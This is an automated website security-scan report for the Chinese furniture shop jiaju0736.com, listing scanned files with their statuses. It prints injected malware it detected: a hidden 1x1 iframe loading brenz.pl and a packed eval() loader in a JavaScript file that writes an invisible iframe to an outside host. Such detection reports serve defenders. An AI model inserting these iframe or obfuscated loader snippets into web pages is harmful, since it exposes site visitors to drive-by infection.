Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jiaju0736.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Scanned pages/files
Request | Server response | Status |
http://www.jiaju0736.com/ | 200 OK Content-Length: 125036 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hz-idc.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="Generator" content="ECSHOP v2.7.3" /> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <meta name="Keywords" content="0736商城 网上商城 网上家具商城 网上家具商城哪家好 网上家居商城 网上家居商城哪家 ...[4085 bytes skipped]...
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/
<iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jiaju0736.com/js/common.js | 200 OK Content-Length: 27597 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function addToCart(goodsId, parentId) { var goods = new Object(); var spec_arr = new Array(); var fittings_arr = new Array(); var number = 1; var formBuy = document.forms['ECS_FORMBUY']; var quick = 0; if (formBuy) { spec_arr = getSelectedAttributes(formBuy); if (formBuy.elements['number']) { number = formBuy.elements['number'].value; while (sel_obj[i]) { sel_obj[i].style.visibility = ""; i++; } } function cancel_div() { document.body.removeChild(docEle('speDiv')); document.body.removeChild(docEle('mask')); var i = 0; var sel_obj = document.getElementsByTagName('select'); while (sel_obj[i]) { sel_obj[i].style.visibility = ""; i++; } } Antivirus reports:
| ||
http://www.jiaju0736.com/js/index.js | 200 OK Content-Length: 2463 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/js/myfocus-1.2.3.min.js | 200 OK Content-Length: 8949 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 7=\\"2://3.4/b.c\\" a=\\"0\\" 8=\\"0\\" 9=\\"0\\"></1>");',13,13,'|iframe|http|winvvv|com|document|writeln|src|height|frameborder|width|cs|h Antivirus reports:
| ||
http://www.jiaju0736.com/js/jquery.min.js | 200 OK Content-Length: 92629 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/js/jquery-1.8.3.min.js | 200 OK Content-Length: 93666 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/plugins/ckplayer/ckplayer.js | 200 OK Content-Length: 12340 Content-Type: application/x-javascript | clean |
http://js.tongji.linezing.com/3387458/tongji.js | 200 OK Content-Length: 13053 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/plugins/qq-kefu/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/plugins/qq-kefu/qqkefuFront.js | 200 OK Content-Length: 421 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/js/jq.js?0828 | 200 OK Content-Length: 133403 Content-Type: application/x-javascript | clean |
http://www.jiaju0736.com/affiche.php?ad_id=76&uri=http%3A%2F%2Fwww.jiaju0736.com%2Fzt%2F20140314.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 29 Jan 2015 07:28:27 GMT Location: http://www.jiaju0736.com/zt/20140314.html Server: IIS Content-Type: text/html Set-Cookie: ECS_ID=7a18e9809ef07343d5ed3d3bf9a438929a0fe7be; path=/ Set-Cookie: ECS[visit_times]=1; expires=Fri, 29-Jan-2016 07:28:28 GMT; path=/ X-Powered-By: WAF/2.0 | clean |
http://www.jiaju0736.com/zt/20140314.html | 404 Not Found Content-Length: 5078 Content-Type: text/html | clean |
http://www.jiaju0736.com/test404page.js | 404 Not Found Content-Length: 5074 Content-Type: text/html | clean |
http://www.jiaju0736.com/?act=city&cityname= | 200 OK Content-Length: 125036 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hz-idc.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="Generator" content="ECSHOP v2.7.3" /> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <meta name="Keywords" content="0736商城 网上商城 网上家具商城 网上家具商城哪家好 网上家居商城 网上家居商城哪家 ...[4085 bytes skipped]...
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/
<iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.jiaju0736.com/?act=city&cityname=wl | 200 OK Content-Length: 125036 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hz-idc.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="Generator" content="ECSHOP v2.7.3" /> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <meta name="Keywords" content="0736商城 网上商城 网上家具商城 网上家具商城哪家好 网上家居商城 网上家居商城哪家 ...[4085 bytes skipped]...
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/
<iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jiaju0736.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: jiaju0736.com
Referer: http://www.google.com/search?q=jiaju0736.com
Result:
The result is similar to the first query. There are no suspicious redirects found.